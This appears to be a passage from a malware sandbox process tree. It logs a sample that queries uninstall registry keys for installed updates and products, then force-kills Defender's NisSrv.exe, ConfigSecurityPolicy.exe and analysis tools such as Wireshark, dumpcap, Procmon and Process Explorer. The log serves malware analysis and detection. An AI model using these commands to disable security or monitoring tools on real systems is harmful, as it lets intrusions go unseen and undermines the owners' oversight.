C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1076
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:924
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:656
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:2032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1436
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:276
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1232
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:936
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:704
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1992
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1464
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:812
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1584
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1400
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1124
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:936
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:656
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-